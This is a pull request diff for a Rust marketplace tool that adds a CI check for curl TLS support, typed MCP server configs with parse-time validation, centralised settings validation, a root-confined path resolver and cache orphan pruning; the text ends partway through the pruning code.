### PR TITLE
chore(audit): resolve fixes.md items + multi-reviewer findings

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -289,6 +289,39 @@ jobs:
           command: check
           arguments: --all-features
 
+  # Verify curl-sys is built with the `ssl` feature so HTTPS clones use
+  # TLS even when curl-sys builds its own libcurl (static / Windows
+  # minimal). The workspace Cargo.toml's `curl = { features = ["ssl"] }`
+  # entry is INERT unless a workspace crate activates it via
+  # `curl = { workspace = true }`; this job catches the regression where
+  # someone removes that activator and HTTPS silently falls back to
+  # plaintext on certain build configurations.
+  assert-curl-tls:
+    name: Assert curl-sys +ssl feature
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v5
+
+      - name: Setup Rust toolchain
+        uses: dtolnay/rust-toolchain@stable
+
+      - name: Setup Rust cache
+        uses: Swatinem/rust-cache@v2
+
+      - name: Inspect curl-sys feature flags
+        run: |
+          set -euo pipefail
+          # cargo tree -e features prints lines like `curl-sys feature "ssl"`
+          # for every active feature on every consumer of curl-sys. If `ssl`
+          # is not active, the dep graph won't contain that line.
+          if ! cargo tree -e features -i curl-sys | grep -F 'curl-sys feature "ssl"'; then
+            echo "::error::curl-sys is missing the 'ssl' feature; HTTPS clones may silently fall back to plaintext on builds with static libcurl. Re-add `curl = { workspace = true }` to a workspace crate, or wire the ssl feature on curl-sys directly."
+            echo "Full feature tree:"
+            cargo tree -e features -i curl-sys
+            exit 1
+          fi
+          echo "OK: curl-sys is built with TLS (ssl feature active)"
+
   # Code coverage for Rust crates
   coverage:
     name: Code Coverage
@@ -331,7 +364,19 @@ jobs:
   ci-success:
     name: CI Success
     if: always()
-    needs: [commitlint, format, lint, test, frontend, build-cli, build-tauri, cargo-deny, coverage]
+    needs:
+      [
+        commitlint,
+        format,
+        lint,
+        test,
+        frontend,
+        build-cli,
+        build-tauri,
+        cargo-deny,
+        assert-curl-tls,
+        coverage,
+      ]
     runs-on: ubuntu-latest
     steps:
       - name: Check all jobs
@@ -349,6 +394,7 @@ jobs:
              [[ "${{ needs.build-cli.result }}" != "success" ]] || \
              [[ "${{ needs.build-tauri.result }}" != "success" ]] || \
              [[ "${{ needs.cargo-deny.result }}" != "success" ]] || \
+             [[ "${{ needs.assert-curl-tls.result }}" != "success" ]] || \
              [[ "${{ needs.coverage.result }}" != "success" ]]; then
             echo "One or more CI jobs failed"
             exit 1

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -792,6 +792,8 @@ checksum = "79fc3b6dd0b87ba36e565715bf9a2ced221311db47bd18011676f24a6066edbc"
 dependencies = [
  "curl-sys",
  "libc",
+ "openssl-probe",
+ "openssl-sys",
  "schannel",
  "socket2",
  "windows-sys 0.59.0",
@@ -806,6 +808,7 @@ dependencies = [
  "cc",
  "libc",
  "libz-sys",
+ "openssl-sys",
  "pkg-config",
  "vcpkg",
  "windows-sys 0.59.0",
@@ -3255,6 +3258,7 @@ version = "0.1.0"
 dependencies = [
  "chrono",
  "clap",
+ "curl",
  "dirs",
  "fs4",
  "gix",
@@ -3773,6 +3777,24 @@ dependencies = [
  "is-wsl",
  "libc",
  "pathdiff",
+]
+
+[[package]]
+name = "openssl-probe"
+version = "0.1.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d05e27ee213611ffe7d6348b942e8f942b37114c00cc03cec254295a4a17852e"
+
+[[package]]
+name = "openssl-sys"
+version = "0.9.113"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ad2f2c0eba47118757e4c6d2bff2838f3e0523380021356e7875e858372ce644"
+dependencies = [
+ "cc",
+ "libc",
+ "pkg-config",
+ "vcpkg",
 ]
 
 [[package]]

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -31,14 +31,19 @@ clap = { version = "4", features = ["derive"] }
 
 # Git
 gix = { version = "0.81", default-features = true, features = ["blocking-network-client", "blocking-http-transport-curl"] }
-# Feature-unification shim: NO crate in this workspace depends on `curl`
-# directly. The entry exists solely so Cargo unifies the `ssl` feature into
-# the transitive `curl-sys` pulled by `gix-transport` — without this,
-# curl-sys builds libcurl with no TLS backend and HTTPS clones fail on
-# Windows (and anywhere else OpenSSL isn't pre-installed). DO NOT remove
-# this dep without first verifying `cargo tree -e features -i curl-sys`
-# still shows `+ssl`. If `gix-transport` is upgraded and the feature flow
-# changes, this entry may also need to be updated or moved to `curl-sys`.
+# Feature-unification activator. kiro-market-core takes this entry as a
+# direct dep (`curl = { workspace = true }`) so Cargo flows the `ssl`
+# feature onto the transitive `curl-sys` pulled by gix-transport.
+#
+# IMPORTANT: a `[workspace.dependencies]` entry alone does NOTHING — it
+# has to be activated by at least one workspace member or the features
+# never propagate. Without that activation, curl-sys builds with no TLS
+# backend and HTTPS clones can silently fall back to plaintext on builds
+# with static libcurl (Windows minimal, vendored CI). The CI job
+# `assert-curl-tls` greps the resolved feature tree for `curl-sys feature
+# "ssl"` so this regression cannot return unnoticed. If `gix-transport`
+# is upgraded and the feature flow changes, this entry may need to depend
+# on `curl-sys` directly instead.
 curl = { version = "0.4", features = ["ssl"] }
 
 # Console

--- a/crates/kiro-control-center/src-tauri/src/commands/kiro_settings.rs
+++ b/crates/kiro-control-center/src-tauri/src/commands/kiro_settings.rs
@@ -5,8 +5,9 @@ use std::sync::Mutex;
 
 use kiro_market_core::file_lock::with_file_lock;
 use kiro_market_core::kiro_settings::{
-    default_kiro_dir, kiro_settings_path, load_kiro_settings_from, registry, remove_nested,
-    resolve_settings, save_kiro_settings_to, set_nested, LoadSettingsError, SettingEntry,
+    apply_registered_setting, default_kiro_dir, kiro_settings_path, load_kiro_settings_from,
+    registry, remove_nested, resolve_settings, save_kiro_settings_to, LoadSettingsError,
+    SettingEntry,
 };
 use serde_json::Value as JsonValue;
 
@@ -99,37 +100,42 @@ pub async fn get_kiro_settings() -> Result<Vec<SettingEntry>, CommandError> {
 }
 
 /// Update a single Kiro CLI setting by key and return the updated entry.
+///
+/// All validation runs inside `apply_registered_setting` so the
+/// "key in registry?" / "value type matches?" / "write" triple stays
+/// atomic at the source of truth (kiro-market-core). Earlier this
+/// command did the registry check here and the type check inline,
+/// then handed the validated triple to the unchecked `set_nested`;
+/// the new helper keeps the three steps inseparable so a future
+/// caller can't drop one by accident.
 #[tauri::command]
 #[specta::specta]
 #[allow(clippy::unused_async)]
 pub async fn set_kiro_setting(key: String, value: JsonValue) -> Result<SettingEntry, CommandError> {
-    let reg_idx = validate_key(&key)?;
-
-    let reg = registry();
-    let def = &reg[reg_idx];
-    if !def.value_type.is_compatible_value(&value) {
+    if key.is_empty() {
         return Err(CommandError::new(
-            format!(
-                "invalid value for '{}': expected {}, got {}",
-                key,
-                def.value_type.type_name(),
-                value_type_label(&value),
-            ),
+            "setting key must not be empty",
             ErrorType::Validation,
         ));
     }
 
     let dir = kiro_dir()?;
     locked_modify(&dir, |json| {
-        set_nested(json, &key, value);
-        Ok(())
+        // All current reject reasons (unknown key, type mismatch) surface
+        // as Validation errors — same severity, same UI treatment. The
+        // catch-all is required because ApplySettingError is
+        // `#[non_exhaustive]`: a future variant added in core (e.g.
+        // ReadOnly, Deprecated) compiles here without forcing a frontend
+        // edit, and its `Display` impl provides the user-facing string.
+        apply_registered_setting(json, &key, value)
+            .map_err(|e| CommandError::new(e.to_string(), ErrorType::Validation))
     })?;
 
     let json = load_settings(&dir)?;
     let entry = resolve_settings(&json)
         .into_iter()
         .find(|e| e.key == key)
-        .expect("key was validated against registry above");
+        .expect("key was validated against registry inside apply_registered_setting");
 
     Ok(entry)
 }
@@ -165,25 +171,14 @@ fn locked_modify(
     })
 }
 
-// ---------------------------------------------------------------------------
-// Utilities
-// ---------------------------------------------------------------------------
-
-/// Human-readable label for a JSON value's type, used in validation errors.
-fn value_type_label(value: &JsonValue) -> &'static str {
-    match value {
-        JsonValue::Null => "null",
-        JsonValue::Bool(_) => "boolean",
-        JsonValue::Number(_) => "number",
-        JsonValue::String(_) => "string",
-        JsonValue::Array(_) => "array",
-        JsonValue::Object(_) => "object",
-    }
-}
-
 #[cfg(test)]
 mod tests {
     use super::*;
+    // Tests reach into set_nested to seed the file directly without
+    // going through the registry-validation path that the production
+    // command uses. Imported in the test module only so it doesn't
+    // appear unused in non-test builds.
+    use kiro_market_core::kiro_settings::set_nested;
 
     #[test]
     fn validate_key_rejects_empty_key() {
@@ -277,18 +272,5 @@ mod tests {
 
         // Should succeed (and not panic) even though the mutex is poisoned.
         let _guard = acquire_settings_lock();
-    }
-
-    #[test]
-    fn value_type_label_covers_all_json_kinds() {
-        assert_eq!(value_type_label(&JsonValue::Null), "null");
-        assert_eq!(value_type_label(&JsonValue::Bool(true)), "boolean");
-        assert_eq!(value_type_label(&JsonValue::from(1)), "number");
-        assert_eq!(value_type_label(&JsonValue::from("s")), "string");
-        assert_eq!(value_type_label(&JsonValue::Array(Vec::new())), "array");
-        assert_eq!(
-            value_type_label(&JsonValue::Object(serde_json::Map::new())),
-            "object"
-        );
     }
 }

--- a/crates/kiro-market-core/Cargo.toml
+++ b/crates/kiro-market-core/Cargo.toml
@@ -26,6 +26,16 @@ chrono = { workspace = true }
 fs4 = { workspace = true }
 clap = { workspace = true, optional = true }
 specta = { version = "2.0.0-rc.24", optional = true, features = ["derive", "serde_json"] }
+# Feature-unification activator: the workspace declares
+# `curl = { features = ["ssl"] }`, but a `[workspace.dependencies]` entry
+# is inert until at least one workspace member takes it as an actual
+# dependency. Without this line, `cargo metadata` shows curl-sys with NO
+# features, and the only reason HTTPS clones work today is that system
+# libcurl happens to ship with TLS — a static-libcurl build (Windows
+# minimal, vendored CI) would silently fall back to plaintext. CI asserts
+# the resolved feature list contains `ssl` so this regression cannot
+# return unnoticed.
+curl = { workspace = true }
 
 [target.'cfg(windows)'.dependencies]
 junction = { workspace = true }

--- a/crates/kiro-market-core/src/agent/emit.rs
+++ b/crates/kiro-market-core/src/agent/emit.rs
@@ -68,8 +68,8 @@ pub fn build_kiro_json(
 
     if !def.mcp_servers.is_empty() {
         let mut servers = Map::new();
-        for (name, raw) in &def.mcp_servers {
-            servers.insert(name.clone(), normalize_mcp_server(raw));
+        for (name, cfg) in &def.mcp_servers {
+            servers.insert(name.clone(), serde_json::to_value(cfg)?);
         }
         obj.insert("mcpServers".into(), Value::Object(servers));
     }
@@ -97,37 +97,19 @@ fn percent_encode_path_segment(s: &str) -> String {
     out
 }
 
-/// Normalize a Copilot MCP server entry toward Kiro's `CustomToolConfig` shape.
-///
-/// Rules:
-/// - `type: "local"` → `type: "stdio"` (Copilot's `local` means "spawn
-///   this as a subprocess"; Kiro's equivalent vocabulary is `stdio`).
-/// - inner `tools` allowlist → dropped. Kiro has no per-server allowlist
-///   field on the server config itself; the outer `tools` array already
-///   handles whole-server access via `@name` references.
-fn normalize_mcp_server(raw: &Value) -> Value {
-    let Some(obj) = raw.as_object() else {
-        return raw.clone();
-    };
-    let mut out = Map::new();
-    for (k, v) in obj {
-        if k == "tools" {
-            continue;
-        }
-        if k == "type" && v.as_str() == Some("local") {
-            out.insert("type".into(), Value::String("stdio".into()));
-            continue;
-        }
-        out.insert(k.clone(), v.clone());
-    }
-    Value::Object(out)
-}
+// `normalize_mcp_server` was deleted with the move to typed
+// `McpServerConfig`. Its two old responsibilities are now handled at
+// the schema level: `type: local` is accepted via `serde(alias = "local")`
+// and emitted as `stdio` via the snake_case discriminator; the Copilot-
+// specific inner `tools: ["*"]` allowlist isn't a field on the typed
+// schema and is silently ignored at parse time. See
+// `agent::types::McpServerConfig`.
 
 #[cfg(test)]
 mod tests {
     use super::*;
     use crate::agent::tools::MappedTool;
-    use crate::agent::types::{AgentDefinition, AgentDialect};
+    use crate::agent::types::{AgentDefinition, AgentDialect, McpServerConfig};
     use std::collections::BTreeMap;
 
     fn sample_claude_def() -> AgentDefinition {
@@ -249,21 +231,28 @@ mod tests {
 
     #[test]
     fn emit_normalizes_mcp_server_type_local_to_stdio() {
+        // The typed schema accepts `type: local` (Copilot vocabulary) via
+        // `serde(alias = "local")` on the Stdio variant. The emitter's
+        // serialize side uses the canonical `stdio` discriminator. The
+        // inner `tools: ["*"]` allowlist that Copilot files often carry is
+        // not a field on the schema — deserialize ignores it, so it
+        // never reaches the emit JSON.
         let mut def = sample_claude_def();
-        def.mcp_servers.insert(
-            "terraform".into(),
-            serde_json::json!({
-                "type": "local",
-                "command": "docker",
-                "args": ["run", "-i"],
-                "tools": ["*"]
-            }),
-        );
+        let mcp: McpServerConfig = serde_json::from_value(serde_json::json!({
+            "type": "local",
+            "command": "docker",
+            "args": ["run", "-i"],
+            "tools": ["*"]
+        }))
+        .expect("parse copilot-style local entry");
+        def.mcp_servers.insert("terraform".into(), mcp);
+
         let out = build_kiro_json(&def, &[]).unwrap();
         let tf = &out["mcpServers"]["terraform"];
         assert_eq!(tf["type"], "stdio");
-        // Inner `tools: ["*"]` allowlist is stripped — Kiro has no equivalent
-        // and @{server} already covers "all tools".
+        assert_eq!(tf["command"], "docker");
+        // Inner `tools: ["*"]` allowlist is stripped — not part of the
+        // typed schema and Kiro has no equivalent.
         assert!(tf.get("tools").is_none());
     }
 
@@ -311,13 +300,13 @@ mod tests {
     #[test]
     fn emit_preserves_non_local_mcp_server_type() {
         let mut def = sample_claude_def();
-        def.mcp_servers.insert(
-            "hosted".into(),
-            serde_json::json!({
-                "type": "http",
-                "url": "https://example.com/mcp",
-            }),
-        );
+        let mcp: McpServerConfig = serde_json::from_value(serde_json::json!({
+            "type": "http",
+            "url": "https://example.com/mcp",
+        }))
+        .expect("parse http entry");
+        def.mcp_servers.insert("hosted".into(), mcp);
+
         let out = build_kiro_json(&def, &[]).unwrap();
         assert_eq!(out["mcpServers"]["hosted"]["type"], "http");
         assert_eq!(

--- a/crates/kiro-market-core/src/agent/parse_copilot.rs
+++ b/crates/kiro-market-core/src/agent/parse_copilot.rs
@@ -12,7 +12,7 @@ use serde::Deserialize;
 use std::collections::BTreeMap;
 
 use super::frontmatter::split_frontmatter;
-use super::types::{AgentDefinition, AgentDialect, ParseFailure};
+use super::types::{AgentDefinition, AgentDialect, McpServerConfig, ParseFailure};
 
 #[derive(Debug, Deserialize)]
 struct CopilotFrontmatter {
@@ -20,8 +20,20 @@ struct CopilotFrontmatter {
     description: Option<String>,
     #[serde(default)]
     tools: Vec<String>,
+    /// MCP server map. Captured at parse-time as
+    /// [`super::types::McpServerConfig`] so:
+    ///
+    /// - typos in the discriminator (`type: lokal` instead of `local`)
+    ///   fail here instead of breaking the agent at runtime;
+    /// - the installer can decide opt-in policy (`--accept-mcp`) based
+    ///   on transport variant rather than peeking inside an opaque
+    ///   JSON value.
+    ///
+    /// Copilot allows an inner `tools: ["*"]` allowlist on each server
+    /// entry; that field is silently ignored on the deserializer side
+    /// (no field captures it) because Kiro has no equivalent.
     #[serde(rename = "mcp-servers", default)]
-    mcp_servers: BTreeMap<String, serde_json::Value>,
+    mcp_servers: BTreeMap<String, McpServerConfig>,
     // `model` accepted and ignored: Copilot uses display names ("Claude
     // Sonnet 4") with no reliable mapping to Kiro model IDs. We take it
     // as Option<String> rather than `#[serde(deny_unknown_fields)]` so
@@ -99,13 +111,30 @@ Body text.
     }
 
     #[test]
-    fn parse_captures_mcp_servers_as_opaque_json() {
+    fn parse_captures_mcp_servers_as_typed_stdio() {
+        // The Copilot fixture's `type: 'local'` is accepted via
+        // `serde(alias = "local")` on the typed Stdio variant. Anything
+        // that doesn't fit the typed schema fails the parse, so we know
+        // by construction here that `command` is a string and `args` is
+        // a Vec<String> — no `serde_json::Value` indexing.
+        use crate::agent::types::McpServerConfig;
         let def = parse_copilot_agent(TERRAFORM).expect("parse");
         assert_eq!(def.mcp_servers.len(), 1);
         let tf = def.mcp_servers.get("terraform").expect("terraform entry");
-        // `type: 'local'` is preserved opaquely; normalization happens at emit time.
-        assert_eq!(tf["type"], "local");
-        assert_eq!(tf["command"], "docker");
+        match tf {
+            McpServerConfig::Stdio { command, args, .. } => {
+                assert_eq!(command, "docker");
+                assert_eq!(
+                    args,
+                    &vec![
+                        "run".to_string(),
+                        "-i".to_string(),
+                        "hashicorp/terraform-mcp-server:latest".to_string()
+                    ]
+                );
+            }
+            other => panic!("expected Stdio variant, got {other:?}"),
+        }
     }
 
     #[test]
@@ -127,5 +156,60 @@ Body text.
     fn parse_dialect_set_to_copilot() {
         let def = parse_copilot_agent(TERRAFORM).expect("parse");
         assert_eq!(def.dialect, AgentDialect::Copilot);
+    }
+
+    #[test]
+    fn parse_rejects_unknown_mcp_server_type_at_parse_time() {
+        // Whole point of the typed McpServerConfig schema is that
+        // typos in the discriminator fail HERE, not later when Kiro
+        // tries to spawn the server. Without this test, the contract
+        // claim in agent/types.rs is unverified — a regression that
+        // accepts any `serde_json::Value` would pass silently.
+        let src = "---\n\
+                   name: bad\n\
+                   description: x\n\
+                   mcp-servers:\n  \
+                     server1:\n    \
+                       type: 'lokal'\n    \
+                       command: docker\n\
+                   ---\n\
+                   body\n";
+        let err = parse_copilot_agent(src).expect_err("unknown discriminator must be rejected");
+        assert!(
+            matches!(err, ParseFailure::InvalidYaml(_)),
+            "expected InvalidYaml for unknown MCP type, got {err:?}"
+        );
+    }
+
+    #[test]
+    fn parse_rejects_stdio_mcp_server_missing_command_field() {
+        // Stdio variant requires `command`. A missing field must fail
+        // at parse, not at install — proves the typed schema actually
+        // enforces required fields per variant.
+        let src = "---\n\
+                   name: bad\n\
+                   mcp-servers:\n  \
+                     server1:\n    \
+                       type: stdio\n\
+                   ---\n\
+                   body\n";
+        let err = parse_copilot_agent(src).expect_err("missing command must be rejected");
+        assert!(
+            matches!(err, ParseFailure::InvalidYaml(_)),
+            "expected InvalidYaml for missing command, got {err:?}"
+        );
+    }
+
+    #[test]
+    fn parse_rejects_http_mcp_server_missing_url_field() {
+        let src = "---\n\
+                   name: bad\n\
+                   mcp-servers:\n  \
+                     server1:\n    \
+                       type: http\n\
+                   ---\n\
+                   body\n";
+        let err = parse_copilot_agent(src).expect_err("missing url must be rejected");
+        assert!(matches!(err, ParseFailure::InvalidYaml(_)));
     }
 }

--- a/crates/kiro-market-core/src/agent/types.rs
+++ b/crates/kiro-market-core/src/agent/types.rs
@@ -3,6 +3,76 @@
 use serde::{Deserialize, Serialize};
 use std::collections::BTreeMap;
 
+// ---------------------------------------------------------------------------
+// MCP server config (typed)
+// ---------------------------------------------------------------------------
+
+/// Strongly-typed MCP server descriptor. Replaces an earlier
+/// `serde_json::Value` "string bag" so:
+///
+/// 1. The downstream installer can reason about whether an agent will
+///    spawn a subprocess (`Stdio`) vs. open a network connection
+///    (`Http` / `Sse`) — the install gate uses this to decide whether
+///    to require `--accept-mcp`.
+/// 2. Malformed entries fail at the parse boundary instead of being
+///    silently passed through to the on-disk JSON, where they would
+///    only break when Kiro tried to execute them.
+/// 3. The emitter no longer needs an opaque `serde_json::Value`-walking
+///    normalize step — variants encode the wire format directly.
+///
+/// Wire format mirrors Kiro's `mcpServers` schema (the destination), with
+/// `serde(alias = "local")` so Copilot's `type: local` keeps deserialising
+/// (Copilot uses `local` for "spawn a subprocess"; Kiro calls the same
+/// thing `stdio`, and we normalise to the latter on the way in).
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
+#[serde(tag = "type", rename_all = "snake_case")]
+#[non_exhaustive]
+pub enum McpServerConfig {
+    /// Subprocess transport: `command` is exec'd with `args`. Anything
+    /// here can run arbitrary code on the host, which is why install
+    /// requires `--accept-mcp` to write a Stdio-bearing agent into the
+    /// project unattended.
+    #[serde(alias = "local")]
+    Stdio {
+        command: String,
+        #[serde(default)]
+        args: Vec<String>,
+        #[serde(default)]
+        env: BTreeMap<String, String>,
+    },
+    /// HTTP transport. Less risky than Stdio (no command execution) but
+    /// the install gate still flags it because the URL points at a
+    /// third party that the user may not have seen.
+    Http {
+        url: String,
+        #[serde(default)]
+        headers: BTreeMap<String, String>,
+    },
+    /// Server-Sent Events transport. Same risk profile as `Http` for
+    /// install-time review.
+    Sse { url: String },
+}
+
+impl McpServerConfig {
+    /// Whether this entry would spawn a subprocess on the user's host.
+    /// The install gate treats Stdio as the most-sensitive class.
+    #[must_use]
+    pub fn is_stdio(&self) -> bool {
+        matches!(self, Self::Stdio { .. })
+    }
+
+    /// Short human-readable label for the transport, used in install-time
+    /// warnings ("agent X brings 2 stdio servers, 1 http server").
+    #[must_use]
+    pub fn transport_label(&self) -> &'static str {
+        match self {
+            Self::Stdio { .. } => "stdio",
+            Self::Http { .. } => "http",
+            Self::Sse { .. } => "sse",
+        }
+    }
+}
+
 /// Which source dialect the agent came from. Used for applying
 /// dialect-specific tool-mapping rules and for warnings.
 ///
@@ -41,8 +111,10 @@ pub struct AgentDefinition {
     /// Raw tool identifiers from the source frontmatter (pre-mapping).
     pub source_tools: Vec<String>,
     /// MCP server entries as captured from Copilot `mcp-servers:` frontmatter.
-    /// Serialized opaquely and passed through to Kiro's `mcpServers` field.
-    pub mcp_servers: BTreeMap<String, serde_json::Value>,
+    /// Typed via [`McpServerConfig`] so the installer can gate execution
+    /// risk (Stdio servers run subprocesses; Http/Sse open network
+    /// connections) and so malformed entries fail at parse time.
+    pub mcp_servers: BTreeMap<String, McpServerConfig>,
     /// Which source dialect produced this definition.
     pub dialect: AgentDialect,
 }

--- a/crates/kiro-market-core/src/cache.rs
+++ b/crates/kiro-market-core/src/cache.rs
@@ -6,7 +6,7 @@
 //! registry file.
 
 use std::fs;
-use std::io;
+use std::io::{self, Write};
 use std::path::{Path, PathBuf};
 
 use chrono::{DateTime, Utc};
@@ -121,28 +121,148 @@ impl MarketplaceSource {
 ///
 /// Handles `~` expansion (via `dirs::home_dir()`) and canonicalization.
 ///
+/// # Trust boundary
+///
+/// This function intentionally trusts whatever path the caller hands it.
+/// Canonicalization follows symlinks all the way to the target, so any
+/// chain (`~/marketplaces/foo` → `/etc`) resolves wherever it points.
+/// That is the correct behavior when the user explicitly asks the CLI to
+/// link an arbitrary path — they have authority over their own filesystem
+/// and the symlink chain is part of that input.
+///
+/// Embedders that route untrusted strings into this function (e.g. the
+/// Tauri desktop app accepting a path from a renderer message) MUST NOT
+/// rely on it to confine the result. Use [`resolve_local_path_restricted`]
+/// instead, which fails when the canonical target falls outside an
+/// allowed-roots list.
+///
 /// # Errors
 ///
 /// Returns an I/O error if the home directory cannot be determined or the
 /// path cannot be canonicalized (e.g. does not exist).
 pub fn resolve_local_path(path_str: &str) -> std::io::Result<PathBuf> {
-    let expanded = if let Some(rest) = path_str.strip_prefix('~') {
+    let expanded = expand_tilde(path_str)?;
+    expanded.canonicalize()
+}
+
+/// Resolve a local path string and require the canonical target to lie
+/// inside one of `allowed_roots`. Defense-in-depth wrapper for callers
+/// (Tauri commands, multi-tenant servers, future plugin sandbox) that
+/// need to confine untrusted input.
+///
+/// Each entry in `allowed_roots` is itself canonicalized, so `~/foo` and
+/// `./foo/../foo` both work as roots. The check uses canonical-prefix
+/// match, so a path that traverses through a symlink ending outside the
+/// allowed set is rejected even if the original string looked OK.
+///
+/// `allowed_roots` being empty rejects every path — same posture as
+/// "deny by default" firewall rules.
+///
+/// # Errors
+///
+/// - I/O errors from canonicalization of either the input path or any
+///   allowed root.
+/// - [`std::io::ErrorKind::PermissionDenied`] if the canonical target is
+///   not under any allowed root. The error message names the rejected
+///   path so the caller can surface it.
+pub fn resolve_local_path_restricted(
+    path_str: &str,
+    allowed_roots: &[&Path],
+) -> std::io::Result<PathBuf> {
+    let resolved = resolve_local_path(path_str)?;
+
+    for root in allowed_roots {
+        let canonical_root = root.canonicalize()?;
+        if resolved.starts_with(&canonical_root) {
+            return Ok(resolved);
+        }
+    }
+
+    Err(std::io::Error::new(
+        std::io::ErrorKind::PermissionDenied,
+        format!(
+            "resolved path `{}` is outside the allowed root set",
+            resolved.display()
+        ),
+    ))
+}
+
+/// Helper: expand a leading `~` to the user's home directory.
+fn expand_tilde(path_str: &str) -> std::io::Result<PathBuf> {
+    if let Some(rest) = path_str.strip_prefix('~') {
         let home = dirs::home_dir().ok_or_else(|| {
             std::io::Error::new(
                 std::io::ErrorKind::NotFound,
                 "could not determine home directory for ~ expansion",
             )
         })?;
-        if rest.is_empty() {
+        Ok(if rest.is_empty() {
             home
         } else {
             home.join(rest.trim_start_matches(['/', '\\']))
-        }
+        })
     } else {
-        PathBuf::from(path_str)
-    };
+        Ok(PathBuf::from(path_str))
+    }
+}
 
-    expanded.canonicalize()
+/// One per-path failure reported by [`CacheDir::prune_orphans`]. The
+/// error is captured as a string rather than a typed `io::Error` so the
+/// report can be cloned and sent across threads / over IPC without
+/// additional plumbing.
+///
+/// `#[non_exhaustive]` so adding context fields later (e.g. a typed
+/// `kind: PruneFailureKind`) is additive for external consumers.
+#[derive(Clone, Debug, Serialize)]
+#[cfg_attr(feature = "specta", derive(specta::Type))]
+#[non_exhaustive]
+pub struct PruneFailure {
+    pub path: PathBuf,
+    pub error: String,
+}
+
+/// Whether [`CacheDir::prune_orphans`] should actually delete or only
+/// report what it would delete. Replaces a `dry_run: bool` parameter
+/// (and the `removed` / `would_remove` parallel-Vec encoding on the
+/// report). Callers ask "what mode produced this report?" and the
+/// answer tells them whether `targets` references files that exist or
+/// files that would have been deleted.
+#[derive(Clone, Copy, Debug, Default, PartialEq, Eq, Serialize)]
+#[cfg_attr(feature = "specta", derive(specta::Type))]
+#[serde(rename_all = "snake_case")]
+#[non_exhaustive]
+pub enum PruneMode {
+    /// Default: prune actually removes orphaned entries from disk.
+    #[default]
+    Apply,
+    /// Identify orphans without deleting them. The resulting
+    /// [`PruneReport::targets`] lists what *would* be removed.
+    DryRun,
+}
+
+/// Outcome of a [`CacheDir::prune_orphans`] call.
+///
+/// The `mode` field disambiguates whether `targets` records actual
+/// deletions ([`PruneMode::Apply`]) or a list of would-be deletions
+/// ([`PruneMode::DryRun`]). Earlier versions encoded this as parallel
+/// `removed` / `would_remove` `Vec`s, which let callers construct
+/// nonsensical reports (both populated) and made `match` statements
+/// against the report shape harder to write.
+///
+/// `#[non_exhaustive]` so extending the report with new summary fields
+/// (totals, time-taken, …) is additive.
+#[derive(Clone, Debug, Default, Serialize)]
+#[cfg_attr(feature = "specta", derive(specta::Type))]
+#[non_exhaustive]
+pub struct PruneReport {
+    /// Which mode produced the report.
+    pub mode: PruneMode,
+    /// Paths the prune acted on (when `mode == Apply`) or would have
+    /// acted on (when `mode == DryRun`).
+    pub targets: Vec<PathBuf>,
+    /// Per-path failures during deletion. Reported rather than thrown so
+    /// a single permission error doesn't abort the whole prune.
+    pub failed: Vec<PruneFailure>,
 }
 
 /// An entry in the known-marketplaces registry.
@@ -304,7 +424,14 @@ impl CacheDir {
     // -- known marketplaces registry ----------------------------------------
 
     /// Path to the `known_marketplaces.json` file.
-    fn registry_path(&self) -> PathBuf {
+    ///
+    /// Visible to the rest of the crate so the service layer can take the
+    /// same advisory lock used here. Without that, the service-level
+    /// "directory exists?" check and the registry-level "name already
+    /// registered?" check would each acquire their own lock, leaving a
+    /// race window between them where two `add` calls for the same name
+    /// can both pass the exists check and clobber each other on rename.
+    pub(crate) fn registry_path(&self) -> PathBuf {
         self.root.join(KNOWN_MARKETPLACES_FILE)
     }
 
@@ -328,7 +455,280 @@ impl CacheDir {
         }
     }
 
+    /// Remove cached marketplace clones and plugin clones whose
+    /// marketplace is no longer in `known_marketplaces.json`.
+    ///
+    /// Two trees get walked:
+    /// - `marketplaces/<name>/` — the cloned (or copy-fallback) repo.
+    ///   A registered marketplace whose source is `LocalPath` is linked
+    ///   via [`crate::platform::create_local_link`] which leaves a
+    ///   symlink/junction or a directory copy here; either way it's
+    ///   represented as one entry under `marketplaces/`.
+    /// - `plugins/<marketplace>/` — per-marketplace plugin clones
+    ///   created lazily by [`crate::service::MarketplaceService::resolve_plugin_dir`]
+    ///   for `Structured` plugin sources. A whole subtree is orphaned
+    ///   when its marketplace is unregistered.
+    ///
+    /// We deliberately do NOT prune individual plugin directories under
+    /// a still-registered marketplace, because they may be mid-install
+    /// on another process or kept as a warm cache for the next install.
+    /// The advisory-locking story would also have to account for
+    /// per-plugin races, which is more cost than the benefit warrants.
+    ///
+    /// `_pending_*` staging directories from a partially-failed `add`
+    /// are also swept — those are guaranteed unreferenced because the
+    /// successful path retargets the guard onto the final name.
+    ///
+    /// # Errors
+    ///
+    /// Returns an [`Error`] only for failures loading the registry. Per
+    /// path I/O failures during deletion are collected into the report's
+    /// `failed` field rather than aborting the prune.
+    pub fn prune_orphans(&self, mode: PruneMode) -> crate::error::Result<PruneReport> {
+        let registered: std::collections::HashSet<String> = self
+            .load_known_marketplaces()?
+            .into_iter()
+            .map(|e| e.name)
+            .collect();
+
+        let mut report = PruneReport {
+            mode,
+            ..PruneReport::default()
+        };
+
+        for (label, dir) in [
+            ("marketplaces", self.marketplaces_dir()),
+            ("plugins", self.plugins_dir()),
+        ] {
+            Self::prune_dir_orphans(label, &dir, &registered, &mut report);
+        }
+
+        // The `registries/` directory holds `<marketplace>.json` files,
+        // not subdirectories. Sweep separately because the filename has
+        // an extension and the entry is a file. Defense in depth against
+        // a remove-vs-add race that briefly drops the registry file
+        // out from under an in-flight add (the add path now writes the
+        // plugin registry inside the registry lock, but a stale entry
+        // from a pre-fix install could still linger).
+        Self::prune_registries_orphans(&self.registries_dir(), &registered, &mut report);
+
+        // Stale per-plugin `.lock` files inside *registered* marketplace
+        // dirs. `with_file_lock(dest)` puts a `<plugin>.lock` sibling
+        // next to `<plugin>/` and never removes it (removing during use
+        // would race with concurrent install attempts that re-create
+        // the file under a different inode and break flock's mutual
+        // exclusion). Lock files for *unregistered* marketplaces are
+        // already swept by the marketplaces/plugins parent removal
+        // above; here we only handle the case where the user manually
+        // deleted `<plugin>/` and left the `.lock` orphan.
